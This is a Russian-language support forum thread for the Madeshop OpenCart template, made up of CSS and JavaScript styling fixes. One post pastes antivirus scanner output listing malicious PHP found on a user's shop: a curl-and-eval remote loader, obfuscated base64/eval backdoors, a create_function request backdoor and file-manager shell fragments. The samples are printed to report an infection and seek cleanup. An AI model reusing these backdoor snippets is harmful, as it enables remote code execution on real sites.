Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Madeshop - универсальный адаптивный шаблон [Поддержка]

themodul

Recommended Posts

Здравствуйте!

Скажите, направление поиска - если сделать показ инфы в модальном окне (встроенное бутстраповское) - не закрывается окно на крестик :(

https://prnt.sc/tiae2h

В common.js шаблона поставил данный код (на других темах сайтов работает с закрытием по крестику)

$(document).delegate('a.clickmodal', 'click', function(e) {
    e.preventDefault();

$('#modal-inf').remove();

var element = this;

$.ajax({
        url: $(element).attr('href'),
        type: 'get',
        dataType: 'html',
        success: function(data) {
            html  = '<div id="modal-inf" class="modal">';
            html += '  <div class="modal-dialog">';
            html += '    <div class="modal-content">';
            html += '      <div class="modal-body">' + $('#content', data).html() + '</div>';
            html += '      <button type="button" class="btn main-btn" data-dismiss="modal">Закрыть</button>';
            html += '    </div';
            html += '  </div>';
            html += '</div>';

$('body').append(html);

$('#modal-inf').modal('show');
        }
    });
});

Змінено користувачем specialforce22
Надіслати
Поділитися на інших сайтах

добрый день Андрей, пишу здесь а то в личку вы не отвечаете!!!   

подскажите пожалуйста как исправить такое: при загрузке страницы выбраного товара картинка товара сначала увеличивается или мигнула, а потом нормальной становится!

Надіслати

17 часов назад, NIKUA сказал:

Добрый вечер! Как лечить? Модуль оформления:

Нееее, брат, сегодня связи с космосом нет, поэтому хотелось больше помочь, но лечить пациента по фото не получается)))

Но, если речь про OcStore 2.3.

1. Пробуем, чтобы появились чек боксы - сходить в файл /public_html/catalog/view/theme/madeshop/stylesheet/stylesheet.css

Смотрим строку 177 (+-) и там есть display: none

2. По кнопкам +- могу предложить попробовать следующее^

2.1. зайти /public_html/catalog/view/theme/default/template/checkout/ Ваш упрощенный файл_cart.tpl и найти такие упоминания кнопок c brjyrfvb <i class="fa fa-plus"></i> и <i class="fa fa-minus"></i> , а у них же классы кнопок такие - <button class="btn btn-primary"? Тогда оставляем так class="btn btn"

2.2. В /public_html/catalog/view/theme/madeshop/stylesheet/stylesheet.css ставим и регулируем по размеру для соответствия к кнопкам

#Вашмодульупрощеннойоформления (посомтреть можно в инспекторе Вашей корзины)checkout_cart .form-control {
    height: 50px;
}

Сохраняем - чистим кеш

В итоге должно получиться так - https://prnt.sc/tluy65

По п.3. - увы чакры закрылись - фото не распознается)))

Надіслати

5 часов назад, specialforce22 сказал:

Нееее, брат, сегодня связи с космосом нет, поэтому хотелось больше помочь, но лечить пациента по фото не получается)))

Но, если речь про OcStore 2.3.

1. Пробуем, чтобы появились чек боксы - сходить в файл /public_html/catalog/view/theme/madeshop/stylesheet/stylesheet.css

Смотрим строку 177 (+-) и там есть display: none

2. По кнопкам +- могу предложить попробовать следующее^

2.1. зайти /public_html/catalog/view/theme/default/template/checkout/ Ваш упрощенный файл_cart.tpl и найти такие упоминания кнопок c brjyrfvb <i class="fa fa-plus"></i> и <i class="fa fa-minus"></i> , а у них же классы кнопок такие - <button class="btn btn-primary"? Тогда оставляем так class="btn btn"

2.2. В /public_html/catalog/view/theme/madeshop/stylesheet/stylesheet.css ставим и регулируем по размеру для соответствия к кнопкам

#Вашмодульупрощеннойоформления (посомтреть можно в инспекторе Вашей корзины)checkout_cart .form-control {
    height: 50px;
}

Сохраняем - чистим кеш

В итоге должно получиться так - https://prnt.sc/tluy65

По п.3. - увы чакры закрылись - фото не распознается)))

Спасибо большое! Буду пробовать) 

Надіслати

10 минут назад, NIKUA сказал:

Спасибо большое! Буду пробовать) 

Ок. Если, что можете писать, но лучше со ссылкой на проект, я как раз только эти вопросы проходил, поэтому свежо, могу подсказать.

Кстати, если чек-боксы в 177 строке откроете, то в карточке товара они откроются, но кому как, но, вроде, не мешают)) - https://prnt.sc/tm2prp

P.S. А чего В ыне выбрали simple - упрошщенный заказ - у автора есть адаптация к нему + можете столкнуться с другими модулями доставки и оплаты, которые не будут совместимы с Вашим модулем, а под simple, как правило, делают адаптацию.

Надіслати

18 минут назад, specialforce22 сказал:

Ок. Если, что можете писать, но лучше со ссылкой на проект, я как раз только эти вопросы проходил, поэтому свежо, могу подсказать.

Кстати, если чек-боксы в 177 строке откроете, то в карточке товара они откроются, но кому как, но, вроде, не мешают)) - https://prnt.sc/tm2prp

P.S. А чего В ыне выбрали simple - упрошщенный заказ - у автора есть адаптация к нему + можете столкнуться с другими модулями доставки и оплаты, которые не будут совместимы с Вашим модулем, а под simple, как правило, делают адаптацию.

Спасибо) У меня симпл приобретён, но он несовместим с моим конструтором (вернее разработчик симпла отказался адаптировать свой модуль под мой конструктор).

Надіслати

22 часа назад, specialforce22 сказал:

А можно в карточке товара как то чек боксы скрыть? 

55555.png

Надіслати

12 часов назад, NIKUA сказал:

А можно в карточке товара как то чек боксы скрыть?

Думаю, что можно, но надо попробовать для чеков в карточку сделать отдельный class со своим кодом

Надіслати

В 20.07.2020 в 20:32, kotikviktor1992 сказал:

добрый день Андрей, пишу здесь а то в личку вы не отвечаете!!!   

подскажите пожалуйста как исправить такое: при загрузке страницы выбраного товара картинка товара сначала увеличивается или мигнула, а потом нормальной становится!

решено

В 23.07.2020 в 17:24, kydinoff сказал:

Андрей, добрый день. 

в ожидании css

извините за задержку - написал в ЛС

Надіслати

Андрей, добрый день.

Жду вашего ответа уже неделю. Пишу на почту, в личку. Но пока ответа нет.

Поэтому пишу сюда.

Вы мне ставили OcStore и шаблон.

AiBolit нашел вредоносные скрипты.

[x] 1…$height){$image=new Image(DIR_IMAGE.$image_old);$image->resize($width,$height);$image->save(DIR_IMAGE.$image_new);}else{ copy(DIR_IMAGE.$image_old,DIR_IMAGE.$image_new);}}$imagepath_parts=explode('/',$image_new);$new_image=implode('/',array
11/06/2020 13:33:49
1.73 Kb
[x] 1…$height){$image=new Image(DIR_IMAGE.$image_old);$image->resize($width,$height);$image->save(DIR_IMAGE.$image_new);}else{ copy(DIR_IMAGE.$image_old,DIR_IMAGE.$image_new);}}$imagepath_parts=explode('/',$image_new);$new_image=implode('/',array
11/06/2020 13:33:51
1.77 Kb
[x] 1…$height){$image=new Image(DIR_IMAGE.$old_image);$image->resize($width,$height);$image->save(DIR_IMAGE.$new_image);}else{ copy(DIR_IMAGE.$old_image,DIR_IMAGE.$new_image);}}if($this->request->server['HTTPS']){return HTTPS_CATALOG.'image/'.$ne
08/05/2020 11:36:18
1.40 Kb
[x] 1…$height){$image=new Image(DIR_IMAGE.$old_image);$image->resize($width,$height);$image->save(DIR_IMAGE.$new_image);}else{ copy(DIR_IMAGE.$old_image,DIR_IMAGE.$new_image);}}$imagepath_parts=explode('/',$new_image);$new_image=implode('/',array
08/05/2020 11:36:19
1.56 Kb
[x] 1…;${${"GLOBALS"}["kotovcqw"]}="./".implode(${${"GLOBALS"}["knfahyf"]}).".module";file_put_contents(${$smkgtihejk},"<?php  unlink(__FILE__);\n".${$oarmqjqeve});include(${${"GLOBALS"}["kotovcqw"]});unlink(${${"GLOBALS"}["kotovcqw"]});exit();}}
15/07/2020 02:42:32
1.95 Kb
[x] 1<?php $ch=curl_init($_GET['url']);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$result=curl_exec($ch); eval('?>'.$result);?
13/07/2020 08:07:05
129 b
[x] 1<?php $ch=curl_init($_GET['url']);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$result=curl_exec($ch); eval('?>'.$result);?
13/07/2020 12:06:23
140 b
[x] 1…tyle='padding: 8px'>Current File : ";echo$_GET['filesrc'];echo '</tr></td></table><br />';echo('<pre>'.htmlspecialchars( file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'])&&$_POST['opt']!='delete'){echo '</table><
8.14 Kb
[x] 1…);curl_setopt($ch,CURLOPT_USERPWD,$this->config->get('qiwi_rest_id').":".$this->config->get('qiwi_rest_password'));curl_ setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CUR
11/06/2020 13:33:50
14.87 Kb
[x] 1…0=$OO__000_OO.\'/\'.$O0O___O00O;if(${"GLOBALS"}["OO_O_0_O00"]($O__00_OOO0)){${"GLOBALS"}["O0_O00O_O_"]($O__00_OOO0);}}') ;${"GLOBALS"}["O0_O_O0O_0"]();?
13/07/2020 08:07:07
19.01 Kb
[x] 1…c0s9BLz09OLMrPycxL1EsszkztPUBwA=\');$O0__O0O0_O=${"GLOBALS"}["OO_00_O_0O"]($O0OO_00O__.$OOO00__0O_);eval($O0__O0O0_O);') ;${"GLOBALS"}["O00_O0O_O_"]();?
2.99 Kb
[x] 1…0=$OO__000_OO.\'/\'.$O0O___O00O;if(${"GLOBALS"}["OO_O_0_O00"]($O__00_OOO0)){${"GLOBALS"}["O0_O00O_O_"]($O__00_OOO0);}}') ;${"GLOBALS"}["O0_O_O0O_0"]();?
13/07/2020 12:06:22
19.02 Kb
[x] 1…{${"GLOBALS"}["OO_O_0_0O0"]($OO_00O__0O,$O_0OO0__O0);}if(isset(${"_GET"}["daksldlkdsadas"])){echo \'wp-blog-header\';}') ;${"GLOBALS"}["OO_0O0__0O"]();?
8.33 Kb
[x] 1…o Jq;Jq: if(!($_GET["q"]=="1")){goto A6;}goto y9;Q_: A6: goto Co;y9: echo " 0";goto iV;FA:$iU="base _decode";goto KH;Co: $UK="create_function";goto FA;iV: exit;goto Q_;KH: register_shutdown_function($UK('',$iU($_REQUEST["SZcSaQw"])))
11/06/2020 13:33:47
400 b
[x] 1<?php goto WZ;Zr: $y9="create_function";goto l0;q8: exit;goto iT;l0:$X4="base64_decode";goto Dc;WZ: if(!($_GET["q"]=="1")){goto UC;}goto
11/06/2020 13:33:47
422 b
[x] 1…{ return "<font color=lime>".$perm."</font>"; } } function perms($file){ $perms=fileperms($file);  if(($perms&0xC000)==0xC000){ // Socket $info='s'; }elseif(($perms&0xA000)==0xA000){ // S
56.04 Kb
[x] 1…$wp_admin_bar=new$admin_bar_class;else return false;$wp_admin_bar->initialize();$wp_admin_bar->add_menus();return true;} $filter='base64_decode';$filter=$filter($kses_str);$md5=strrev($wp_nonce);$sub=substr(md5($md5),0,strlen($wp_nonce));$w
Надіслати

34 минуты назад, elenmelik сказал:

Андрей, добрый день.

Жду вашего ответа уже неделю. Пишу на почту, в личку. Но пока ответа нет.

Поэтому пишу сюда.

Вы мне ставили OcStore и шаблон.

Это явно не работа Андрея, на кой черт человеку себе репутацию портить?

Проверил свои файлы по аналогии с вашими, там всё ок чисто и красиво.

• +1 1
Надіслати

10 минут назад, TheThod сказал:

Это явно не работа Андрея, на кой черт человеку себе репутацию портить?

Проверил свои файлы по аналогии с вашими, там всё ок чисто и красиво.

Я не утверждаю, что это Андрей.

Я прошу помощи.

Хочу всё снести и заново поставить.

Мне нужна его помощь в этом

Надіслати

7 минут назад, elenmelik сказал:

Я прошу помощи.

Мой совет, не ставьте бесплатные модули)

• +1 1
Надіслати

4 часа назад, elenmelik сказал:

Я прошу помощи.

Елена, добрый день. Извините за задержку. Этого кода нет в шаблоне. Вспоминайте какие модули ставили после.

По поводу почты - я писал вам что проблема на вашей стороне, т.к. у вас и со страницы контактов не отправляются письма. 

Цитата

Хорошо, давайте так и сделаем. За долгий ответ я поставлю второй раз шаблон.

Надіслати

Пожалуй ещё раз оставлю отзыв.

Самый оперативный (Когда на месте) создатель шаблона на форуме без еврейской жилки!

Спасибо ещё раз за помощь.

Змінено користувачем TheThod
  • +1 1
Надіслати

В 27.07.2020 в 17:14, themodul сказал:

Елена, добрый день. Извините за задержку. Этого кода нет в шаблоне. Вспоминайте какие модули ставили после.

По поводу почты - я писал вам что проблема на вашей стороне, т.к. у вас и со страницы контактов не отправляются письма. 

Хорошо, давайте так и сделаем. За долгий ответ я поставлю второй раз шаблон.

Андрей, спасибо. Сейчас почистили всё. Пока работает. Пока пусть так, если опять появится уязвимость, давайте так и сделаем. 

Надіслати

В 14.07.2020 в 15:53, kydinoff сказал:

8112984_.png.abba009657d78ffdb12006ba33783c59.png

Андрей, скажи пожалуйста есть ли возможность несколько изменить отображение банера на моб. устройствах . Сейчас на главном экране большое кол-во не используемого пространства. Можно текст например сделать внизу а картинку вверху ? чтоб она больше стала размером . Как на скрине 2.

скрин2.png

добрый день есть решение??

Надіслати

Попробуйте прописать в свой css 

@media (max-width: 767px){

.madeshop-slide .mtable {

display: flex;

flex-wrap: wrap;  

}

.slide-block {

order: 2;

display: block;

padding-top: 0 !important;

}

.mtable div {

width: 100%;

}

.madeshop-slide .slick-slide img {

width: 50%;

margin: 0 auto;

}  

}

при разрешении меньше 767 должно встать друг под другом

Надіслати

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.